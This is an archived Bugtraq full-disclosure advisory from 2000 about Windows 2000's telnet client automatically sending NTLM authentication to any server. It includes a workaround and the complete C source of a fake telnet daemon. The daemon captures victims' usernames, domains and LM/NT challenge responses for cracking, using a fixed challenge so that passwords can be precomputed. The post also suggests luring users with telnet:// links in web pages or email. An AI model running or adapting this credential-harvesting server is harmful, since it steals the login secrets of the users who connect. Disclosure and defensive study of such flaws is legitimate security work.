Bugtraq mailing list archives
Win2k Telnet.exe malicious server vulnerability
From: monti <monti () USHOST COM>
Date: Wed, 13 Sep 2000 15:13:29 -0500
Microsoft was informed of this problem (with exploit) over a month ago. I received some token responses right after emailing them, but have heard nothing since. If they have released an advisory of their own yet, I have not seen it. I informed them up-front that I would release a full-disclosure advisory of my own in 3 weeks time. They have had much more than that to take action. Problem: ======== Windows 2000's telnet client 'telnet.exe' supports performing NTLM authentication using the credentials of the logged in user. If it connects to an NTLM enabled telnet server (i.e. a Win2k server with the MS provided telnet service) it will automatically attempt to log in with the users credientials without prompting them for any information. The NTLM challenge/response protocol as others have shown, is vulnerable to brute-force cracking. L0phtCrack, with it's "sniffed NT hash cracking" capabilities is an excellent implementation. This behavior is seen consistently in other Microsoft written clients. IE, Netbios Workstation (i.e. windows itself over netbios), and probably others have and/or do automatically authenticate the user with NTLM (and sometimes other even worse schemes) without prompting them. NTLM challenge/response is *NOT* an iron authentication scheme, MS! Stop trusting it so much! Vulnerability/Exploit Description: ================================== In short, if you can get the user or his/her machine to telnet to you with telnet.exe, you can get ahold of enough information to perform a brute-force/dictionary crack on their password (and find our their Domain if they are logged into one). Even if you arent going to crack their password, you can get entirely too much information IMO. During my tests I discovered that IE associates the telnet:// URL with the vulnerable telnet.exe. This opens up several possible ways to force a user into connecting to you with a malicious HTLM web page, email message, and so on. I would speculate that it might also be possible to force this to happen without user intervention with javascript/activeX/java or really creative HTLM. I try really hard not to do HTLM/web-code anymore unless it's really necessary so I didnt test this. Also, since NTLM relies on the server "randomly generating" an 8-byte challenge for the authentication, we can choose our own with the code provided and use it to pre-compute a database of encrypted passwords to avoid even having to crack them. Also attached is a really ugly bit of code I hobbled together a while back that can be used to do this. Please see the exploit for technical details. I hope the ntlm structures and functions will be useful to others in the future on their own Windows nt/2000 projects. I have used roughly the same routines for IIS/IE-ntlm HTTP Auth code on Unix. Please note, this code will only work on intel or other little-endian systems right now... I didnt get any architecture dependent byte-order logic worked in yet. Workaround/Fix: =============== The NTLM functionality in telnet.exe is optional, but it is enabled by default on all W2000 installations i've seen. To turn of NTLM in telnet, just run 'telnet.exe' without arguments which will get you into a cli for setting/unsetting variables and so on. Then type 'unset NTLM'. This will disable all NTLM functionality in the client, so... if for some really ill-advised reason you want or need this function, you're out of luck unless Microsoft comes up with something better. Credits: ======== I should mention that I heard at DefCON that cDc/Newhackcity had discovered and discussed this vulnerability during one of their presentations that I missed. I did not colaborate with them on this and had run across it myself before vegas, but Microsoft informed me that they had also been contacted by cDc with the same bug. I havent seen any material from them published yet though, so as far as I know this is the first full public disclosure. Other credits and thanks: DMZ, Changeling, Brent, and Nate... thanks for your help testing and playing with this in vegas. Ronald Tschalar for his paper at: http://www.innovation.ch/java/ntlm.html. As you can see in my code, I definitely made use of some of his ideas. Paul Ashton published an material based on this same stupid behavior in IE 3.0/4.0 back in 96/97 or so and his advisories helped get me thinking about NTLM games to play in all the new protocols it's been implemented in. A copy of his advisory is at: http://www.insecure.org/sploits/winnt.automatic.authentication.html Author: ======= Yeza (9/2000)
/* NTLM telnetD v0.8 Snarfs NTLM challenge/response by convincing w2k telnet client to auto-authenticate. Outputs auth-data in LophtCrack sniff format on stdout. compile: gcc -o w2kteld ntlm_telnetd.c run: ./w2kteld Then wait for w2k to telnet to you. for the impatient, there are always ways of making w2k telnet! proof-of-concept version. more features to be added. by yeza (8/2000) */ #include <stdio.h> #include <unistd.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #define LISTEN_PORT 23 #define LISTENADDR "0.0.0.0" #define VERBOSE 0 // 1 for verbose #define CHALLENGE "\xde\xad\xbe\xef\xde\xad\xbe\xef" #define MAXBUF 2048 /* Below are hardcoded telnet negotiation values. These are based on packet sniffs and as little decoding as possible. I'm lazy and this isnt really a telnet server so why muck with telnet.h? */ static unsigned char *srv_neg1 = "\xff\xfd\x25\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x00\xff\xfb\x00"; static unsigned int srv_neg1_sz = 18; static unsigned char *srv_neg2 = "\xff\xfa\x25\x01\x0f\x00\xff\xf0"; static unsigned int srv_neg2_sz = 8; /* Below is the hardcoded NTLM challenge. Change the 8-byte challenge above if you dont like the smell of 'deadbeef' Change the hostname if desired -- but keep tabs on hostname len, telnet hdr size and 'srv_fake_NTLM_challenge_sz' if you do. */ static unsigned char *srv_fake_NTLM_challenge = "\xff\xfa\x25\x02\x0f\x00\x01" /* telnet auth head */ "\x38\x00\x00\x00" /* Size of challenge token */ "\x02\x00\x00\x00" /* L int = 2 ?unknown? */ "NTLMSSP\x00" /* Token header START TOKEN */ "\x02\x00\x00\x00" /* NTLM sequence = 2 */ "\x08\x00\x08\x00" /* hostname len (twice) */ "\x30\x00\x00\x00" /* hostname offset */ "\x05\x82\x02\x00" /* 4-byte flags */ CHALLENGE /* 8-byte challenge */ "\x00\x00\x00\x00\x00\x00\x00\x00" /* unused */ "\x00\x00\x00\x00" /* unused len */ "\x38\x00\x00\x00" /* unused offset */ "D\x00O\x00I\x00T\x00" /* hostname "DOIT"(u-code) END TOKEN */ "\xff\xf0" /* telnet auth tail */ ; static unsigned int srv_fake_NTLM_challenge_sz = 73; int printhexdump (unsigned char *buf, int len) { int i; for(i=0; i < len; i++) { fprintf (stderr, "%02x ", buf[i]); } fprintf (stderr, "\n"); return (i); } void cphex (unsigned char *dest, unsigned char *src, unsigned int dlen) { int i; for (i=0; i < dlen; i+=2) { snprintf ((char *)(dest+i), 3,"%02x", src[(i/2)]); } } void dropconn (int sock) { close(sock); fprintf(stderr, "\nConnection Closed\n"); } /* Structure to hold snarfed auth. information */ struct client_info { unsigned char user[128]; unsigned char dom[128]; unsigned char host[128]; unsigned char ipaddr[16]; unsigned char chal[17]; unsigned char lmh[49]; unsigned char nth[49]; } cli_info; /* NTLM TOKEN HEADERS */ /* Request token header structure */ /* 32 bytes for this header */ struct reqtoken { unsigned char protocol[8]; // "NTLMSSP\0" unsigned int type; // 1 unsigned char flags[4]; // NTLM flags unsigned short dlen,dlen2; // Domain length unsigned int dpos; // Domain position unsigned short hlen,hlen2; // Hostname length unsigned int hpos; // Hostname position // unicode domain (variable length) // unicode hostname (variable length) }; /* Challenge token header structure */ /* 48 bytes for this header */ struct chaltoken { unsigned char protocol[8]; // "NTLMSSP\0" unsigned int type; // 2 unsigned short hlen,hlen2; // Hostname length unsigned int hpos; // Hostname position unsigned char flags[4]; // NTLM flags unsigned char chal[8]; // 8-byte NTLM Challenge unsigned short nl,nl2; // unused length unsigned int np; // unused position unsigned short tl,tl2; // unknown, possibly unused unsigned int tlen; // Total length of token. // unicode hostname (variable length) // unused string... does appear to be used by w2k telnetd }; /* Response token header structure */ /* 64 bytes for this header */ struct resptoken { unsigned char protocol[8]; // "NTLMSSP\0" unsigned int type; // 3 unsigned short lmrlen,lmrlen2; // LM hash response length (24 always) unsigned int lmrpos; // LM hash response position unsigned short ntrlen,ntrlen2; // NT hash response length (24 always) unsigned int ntrpos; // NT hash response position unsigned short dlen,dlen2; // Domain length unsigned int dpos; // Domain position unsigned short ulen,ulen2; // Username length unsigned int upos; // Username position unsigned short hlen,hlen2; // Hostname length unsigned int hpos; // Hostname position unsigned short tl,tl2; // unknown, presumably unused unsigned int tlen; // Total length of token unsigned char flags[4]; // NTLM flags // unicode domain (variable length) // unicode user (variable length) // unicode hostname (variable length) // lm hash response (24-bytes) // nt hash response (24-bytes) }; /* Stupid little Unicode helper */ int lame_ucode(unsigned char *dst, unsigned char *src, int len) { int i; for(i=0;i<len;i++){ *(dst++) = src[i]; *(dst++) = '\0'; } return (i); } /* Stupid little de-Unicode helper */ int lame_deucode(unsigned char *dst, unsigned char *src, int len, int maxlen) { int i; len--; if (maxlen < (len)) len=maxlen; for(i=0;i<len;i++){ if (src[i] != '\0') *(dst++) = src[i]; } *(dst++) = '\0'; /* Throw in -1- null... !@#$AT THE END!@#$ */ return(strlen(dst)); } void get_resptoken(unsigned char *src, unsigned int len) { struct resptoken *rp = (struct resptoken *) src; lame_deucode(cli_info.user, (unsigned char *) rp+rp->upos, rp->ulen, sizeof(cli_info.user)); lame_deucode(cli_info.host, (unsigned char *) rp+rp->hpos, rp->hlen, sizeof(cli_info.host)); lame_deucode(cli_info.dom, (unsigned char *) rp+rp->dpos, rp->dlen, sizeof(cli_info.dom)); cphex(cli_info.lmh, (unsigned char*) rp+rp->lmrpos, 48); cphex(cli_info.nth, (unsigned char*) rp+rp->ntrpos, 48); } /* gettoken Check 'len' bytes from 'src' as an NTLM token fork get_resptoken depending on type. Returns 0 if everything looks good. */ int gettoken (unsigned char *src, unsigned int len) { struct chaltoken *srctk = (struct chaltoken *) src; unsigned int type = *(src+8); /* check protocol */ if ((strncmp(src, "NTLMSSP\0", 8)) || (type > 3)) return (-1); if(type == 1) { fprintf(stderr, "Got NTLM request token\n"); return(0); } else if(type == 3) { if(len > (sizeof(struct resptoken)) + 48) { fprintf(stderr, "Got NTLM response token\n"); get_resptoken(src,len); } else { return(-1); } } else { fprintf(stderr, "Type 2 not handled\n"); return(-1); } return(0); } void usage(unsigned char *progname) { fprintf(stderr, "Usage: %s [options]\n", progname); fprintf(stderr, " -v verbose\n" " -l port listen on 'port'\n" " -h help\n"); exit(1); } int main(int argc, char **argv) { struct sockaddr_in server, client; unsigned int lsock, o; unsigned int port = LISTEN_PORT; unsigned int verbose = VERBOSE; ssize_t rlen, ctklen; unsigned char rbuf[MAXBUF]; unsigned char ntlm_challenge[8] = CHALLENGE; cphex(cli_info.chal, ntlm_challenge, 16); fprintf(stderr,"[ Fake NTLM Telnet Daemon - by yeza ]\n"); while ((o = getopt(argc, argv, "vl:h")) != -1) { switch(o) { case 'v': ++verbose; break; case 'l': if(optarg) { port = atoi(optarg); break; } else { usage(argv[0]); } case 'h': usage(argv[0]); } } lsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (lsock < 0) { fprintf(stderr, "Cannot create listening socket: %m\n"); exit(1); } server.sin_family = AF_INET; server.sin_addr.s_addr = inet_addr(LISTENADDR); server.sin_port = htons(port); if (bind(lsock, (struct sockaddr *) &server, sizeof(server)) < 0) { fprintf(stderr, "Cannot bind socket: %m\n"); close(lsock); exit(1); } listen(lsock, 200); fprintf(stderr, "Listening on port %d\n", ntohs(server.sin_port)); fprintf(stderr, "Awaiting connections\n\n"); while (1) { int csock, cl_addrlen; unsigned int reqlen, resplen; if((csock = accept(lsock, 0, 0)) < 0) { fprintf(stderr, "Cannot accept socket: %m\n"); continue; } cl_addrlen = sizeof(client); if(getpeername(csock, &client, &cl_addrlen) < 0) { fprintf(stderr, "Cannot get peer name of remote host: %m\n"); dropconn(csock); continue; } fprintf(stderr, "Connection from: %s\n", (char *) inet_ntoa(client.sin_addr.s_addr)); strncpy(cli_info.ipaddr,(char *)inet_ntoa(client.sin_addr.s_addr), 15); /* ============ This begins our telnet auth handshake ===============*/ /* server sends: (srv_neg1) DO AUTHENTICATION, WILL ECHO, DO SUPPRESS GO AHEAD, DO NAWS, DO BINARY, WILL BINARY */ send(csock, (char *) srv_neg1, srv_neg1_sz, 0); /* client sends back: WILL AUTHENTICATION */ rlen = recv(csock, (char *) rbuf, MAXBUF, 0); if(verbose>0){ fprintf(stderr, "\n%d byte response to neg1 =\n", rlen ); printhexdump(rbuf, rlen); } if(strncmp(rbuf, "\xff\xfb\x25", 3) != 0) { //just check first 3 bytes fprintf(stderr, "Wrong telnet neg1 response from client\n"); dropconn(csock); continue; } memset(rbuf, '\0', MAXBUF);rlen=0; /* server sends: (srv_neg2) SB AUTHENTICATION SEND ... SE */ send(csock, (char *) srv_neg2, srv_neg2_sz, 0); rlen = recv(csock, (char *) rbuf, MAXBUF, 0); if(verbose>0) { fprintf(stderr, "\n%d byte response to neg2 =\n", rlen ); printhexdump(rbuf, rlen); } if(strncmp(rbuf, "\xff\xfd", 2) != 0) { fprintf(stderr, "Wrong telnet neg2 response from client\n"); dropconn(csock); continue; } memset(rbuf, '\0', MAXBUF); rlen=0; /* Receive what should be the NTLM Request Token */ rlen = recv(csock, (char *) rbuf, MAXBUF, 0); if(verbose>0) { fprintf(stderr, "\nReceived %d byte request token =\n", rlen ); printhexdump(rbuf, rlen); } if(gettoken( rbuf+15, *(rbuf+7)) != 0) { fprintf(stderr, "Doesnt look like a NTLM request token.\n"); dropconn(csock); continue; } memset(rbuf, '\0', MAXBUF);rlen=0; /* Send NTLM Challenge Token */ fprintf (stderr, "Sending NTLM challenge token\n"); if(verbose>0) { printhexdump(srv_fake_NTLM_challenge, srv_fake_NTLM_challenge_sz); } send(csock, (char *) srv_fake_NTLM_challenge, srv_fake_NTLM_challenge_sz, 0); /* Receive what should be the NTLM Response Token */ rlen = recv(csock, (char *) rbuf, MAXBUF, 0); if(verbose>0) { fprintf(stderr, "\n%d byte response to challenge=\n", rlen ); printhexdump(rbuf, rlen); fprintf(stderr, "\n"); } if(gettoken(rbuf+15, *(rbuf+7)) != 0) { fprintf(stderr, "Doesnt look like a NTLM request token.\n"); dropconn(csock); continue; } memset(rbuf, '\0', MAXBUF);rlen=0; /* Were done with this victim */ dropconn(csock); fprintf(stdout, "%s\\%s@%s/%s:3:%s:%s:%s\n", cli_info.dom, cli_info.user, cli_info.ipaddr, cli_info.host, cli_info.chal, cli_info.lmh, cli_info.nth); fflush(stdout); } close(lsock); return(0); }
Attachment:
prehash.tgz
Description:
Current thread:
- Win2k Telnet.exe malicious server vulnerability monti (Sep 13)
- Re: Win2k Telnet.exe malicious server vulnerability Jim Paris (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Micah Webner (Sep 14)
- <Possible follow-ups>
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability monti (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Tim Hollebeek (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Blue Boar (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Рягин Михаил Юрьевич (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)
- Re: Win2k Telnet.exe malicious server vulnerability J Edgar Hoover (Sep 18)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)